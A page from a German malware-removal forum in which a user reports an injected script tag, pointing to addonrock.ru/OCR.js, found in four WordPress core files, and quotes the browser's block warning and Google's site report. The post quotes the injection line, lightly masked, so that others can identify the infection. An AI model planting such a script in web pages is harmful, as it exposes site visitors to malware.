Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js


Plagegeister aller Art und deren Bekämpfung: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
Alt 17.09.2010, 19:44   #1
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js


Hallo,
heute sagte mir mein Bekannter, dass er eine Fehlermeldung bekam, als er seinen Wordpress-Blog aufrufen wollte. Vielleicht ist der folgende Sachverhalt wichtig um die Verbreitung von Malware zu verhindern. Als er an der betreffenden Stelle nach dem Fehler schaute, fand er dort ein unbekanntes Script.

Code:
ATTFilter
<script type="text/javascript" src="h***://addonrock.ru/OCR.js"></script>
<!--c9168d0ef49443a787ad05c469485c26-->
Auch stellte er fest, dass in dem "wp-includes"-Ordner vier Dateien zum gleichen Zeitpunkt geändert wurden. In allen Dateien befand sich der oben aufgeführte Quellcode. Geändert wurden im oben benannten Ordner:
- default-constants.php
- default-embeds.php
- default-filters.php
- default-widgets.php

Wenn man die im Quellcode benannte Domain öffnen will, dann kommt bei mir eine Fehlermeldung:
Zitat:
Als attackierend gemeldete Website!

Die Website auf addonrock.ru wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.

Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert.
Wenn man dort auf das Button "warum wurde diese Seite blockiert?" klickt, kommt folgende Information:
Zitat:
Wie ist die gegenwärtige Einstufung von addonrock.ru?

Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 1 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Bei 0 Seite(n) von insgesamt 12 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-09-17 und in den letzten 90 Tagen wurde auf dieser Website kein verdächtiger Content gefunden.

Malicious software includes 17 trojan(s), 6 exploit(s).

This site was hosted on 9 network(s) including AS14929 (VITELITY), AS15830 (TELECITY), AS33823 (GEMENII).

Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

In den letzten 90 Tagen hat addonrock.ru offenbar als Überträger für die Infektion von 12 Website(s) fungiert, darunter abcmoney2010.com/, varahaschool.com/, naturallove.co.kr/.

Hat diese Website Malware gehostet?

Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Wie kam es zu dieser Einstufung?

Gelegentlich wird von Dritten bösartiger Code in legitime Websites eingefügt. In diesem Fall wird unsere Warnmeldung angezeigt.

Nächste Schritte:

* Zur vorherigen Seite zurückkehren.
* Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.
Jetzt meine Fragen zu diesem Sachverhalt. Kann jemand hilfreiche Angeben machen? Um was handelt es sich hier genau? Reicht es wenn oben benannter Quellcode aus den Dateien entfernt wird, um schädlichen Einfluss zu unterbinden? Wie funktioniert es, dass Dritte den Dateien einfach ein Code beigefügen können?

Vielen Dank bereit für eine Antwort und schonmal ein schönes Wochenende!


Stabilo

 

Themen zu Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js
attackierende, aufrufe, bereit, button, bösartiger code, code, computer, dateien, fehlermeldung, festgestellt, folge, frage, funktioniert, google, infektion, malware, programme, script, seite, seiten, server, software, system, trojan, unterbinden, viren, warnmeldung, warum, websites, wichtig, wordpress


« Brauche dringende Informationen über TR/HORSE.HPD | Desktop Security 2010 nicht entfernbar »


Ähnliche Themen: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js


  1. Apache Traffic Server 6 bringt HTTP/2-Support
    Nachrichten - 22.09.2015 (0)
  2. Sicherheitsupdate für WordPress
    Nachrichten - 23.07.2015 (0)
  3. WordPress-Plug-in Slimstat gefährdet Server
    Nachrichten - 25.02.2015 (0)
  4. Angriffe auf Web-Server via Wordpress-Plugin MailPoet
    Nachrichten - 21.07.2014 (0)
  5. Mac - lokale Wordpress Installation - unerwünschte Hotword Links zu http://de.clickcompare.info
    Alles rund um Mac OSX & Linux - 11.03.2014 (7)
  6. Infektion mit http://www.qvo6.com und http://static.icmapp.com
    Log-Analyse und Auswertung - 04.12.2013 (7)
  7. Wordpress Seite verseucht...
    Plagegeister aller Art und deren Bekämpfung - 12.10.2013 (2)
  8. Alle Server gehackt !? JS, htaccess - http://habboigratis.altervista.org
    Plagegeister aller Art und deren Bekämpfung - 05.02.2013 (3)
  9. Unbekanntes Script verbreitet sich auf Kundenseite
    Plagegeister aller Art und deren Bekämpfung - 21.08.2012 (8)
  10. Wordpress 3.4.1 stopft Sicherheitslücken
    Nachrichten - 29.06.2012 (0)
  11. WordPress 3.1.3 schützt vor Klickdiebstahl
    Nachrichten - 26.05.2011 (0)
  12. WordPress 2.8.5 mit verbesserter Sicherheit
    Nachrichten - 21.10.2009 (0)
  13. Sicherheits-Update für WordPress
    Nachrichten - 04.08.2009 (0)
  14. Ftp server (Filezilla / Quick n´easy FTP server lite)
    Alles rund um Windows - 10.01.2009 (7)
  15. [Suche]Http/Server Virenscanner
    Antiviren-, Firewall- und andere Schutzprogramme - 17.06.2008 (2)
  16. Was ist das: <script language='javascript' src='http://127.0.0.1:1027/js.cgi?pcaw&r=1
    Plagegeister aller Art und deren Bekämpfung - 18.10.2004 (4)
  17. 802.1.x Radius Server, Wlan und Win 2000 server
    Alles rund um Windows - 19.10.2003 (5)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Hallo, heute sagte mir mein Bekannter, dass er eine Fehlermeldung bekam, als er seinen Wordpress-Blog aufrufen wollte. Vielleicht ist der folgende Sachverhalt wichtig um die Verbreitung von Malware zu verhindern. - Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js...
Archiv
Du betrachtest: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131